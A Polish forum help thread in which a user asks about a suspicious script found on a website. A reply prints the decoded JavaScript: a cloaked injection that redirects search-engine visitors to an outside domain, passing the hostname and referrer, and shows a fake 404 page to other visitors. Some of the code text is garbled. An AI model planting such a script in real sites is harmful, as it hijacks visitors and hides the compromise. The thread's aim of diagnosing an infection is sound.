Skocz do zawartości
Schleppel

Infekcja. Java Script.

Rekomendowane odpowiedzi

Mam drobny problem -wlazłem na jakąś stronę, patrzę, a ta mi się coś długo włącza, w dodatku wyświetlając "mój komputer" jako nazwę strony. Zapisałem stronę; wyświetliłem jej kod w notatniku i okazało się, że cholerstwo miało w sobie java script:

 

murtinreid . com /js/ 12

 

Oddzieliłem link spacjami, aby nikt przypadkowo nie kliknął. W sumie nie mam pojęcia co to robi, ani do czego służy, ale zakładam, że to nic dobrego. Ktoś mógłby to dla mnie sprawdzić i ewentualnie powiedzieć, jak to usunąć?

 

Za ewentualną pomoc -z góry dzięki.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Tutaj masz odkodowane:

evaluateuate(unescape("

var r = document.referrer;

if (r.indexOf("google") != -1 || r.indexOf("msn") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.location ="http://murtinreid.com/in.php?n=1500&s="+escape(location.hostname)+"&p=" + escape®.replace(/\+/g,"%2B")

} else {

document.title = "404 Not Found";

document.write("<h1>Not Found</h1>The requested URL " + location.pathname + " was not found on this server.<p><hr><address>Apache/1.3.39 Server at " + location.hostname + " Port 80</address><div style='display:none'>")

}

"))

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dobra, z pomocą znajomego z Mac'iem udało mi się odkryć co zawiera php z transkrypcji js. Dobrze zrobiłem, że nie wchodziłem na nią ponownie i że za pierwszym razem nie czekałem, aż doczyta się do końca... Inna rzecz, że nadal mam pewne obawy; niby jeszcze nic się nie wyświetliło, ale coś już mogło się zacząć ściągać -części kodu zaś niestety nie rozumiem. Dlatego proszę Was o rozwianie moich obaw 8O Za ewentualną pomoc znowu z góry dziękuje...

 

Poniżej link do kodu:

 

http://wklej.org/id/55953/

 

+ Trap-fail:

post-163607-1235321661_thumb.jpg

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dołącz do dyskusji

Możesz dodać zawartość już teraz a zarejestrować się później. Jeśli posiadasz już konto, zaloguj się aby dodać zawartość za jego pomocą.

Gość
Dodaj odpowiedź do tematu...

×   Wklejono zawartość z formatowaniem.   Przywróć formatowanie

  Dozwolonych jest tylko 75 emoji.

×   Odnośnik został automatycznie osadzony.   Przywróć wyświetlanie jako odnośnik

×   Przywrócono poprzednią zawartość.   Wyczyść edytor

×   Nie możesz bezpośrednio wkleić grafiki. Dodaj lub załącz grafiki z adresu URL.

Ładowanie


×
×
  • Dodaj nową pozycję...